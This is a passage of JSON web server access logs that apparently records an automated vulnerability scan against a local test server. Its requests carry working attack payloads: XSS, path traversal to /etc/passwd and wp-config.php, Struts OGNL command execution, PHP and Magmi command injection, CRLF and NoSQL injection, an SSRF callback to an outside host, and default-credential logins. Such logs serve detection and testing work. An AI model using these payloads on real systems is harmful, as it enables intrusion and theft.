+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /-/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.esmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/pr.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-fpm.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/..;/css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/node_info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"SPOOLDIR=test\x22.system(id).\x22&recheck=Recheck","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager?type=Files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://ca28q98smpvbk9ig07h05hm9zrh9u9fmg.oast.online%23.salesforce.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/automerge.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /svnserve.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x22code\x22: {\x22$gt\x22: 0}, \x22password\x22: \x22SuperStrongPassword1\x22, \x22passwordConfirmation\x22: \x22SuperStrongPassword1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/auth/reset-password HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"recipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /NateMail.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie%3Acrlfinjection/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMUser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"system.listMethods","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"TRACE / HTTP/1.1","status":"405","body_bytes_sents":"556","req_time":"0.000","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"TRACE", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/docker.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"imgSrc=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_saveprofile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?id=50&file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"USERNAME=student&PASSWORD=student@123&language=en&log=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php 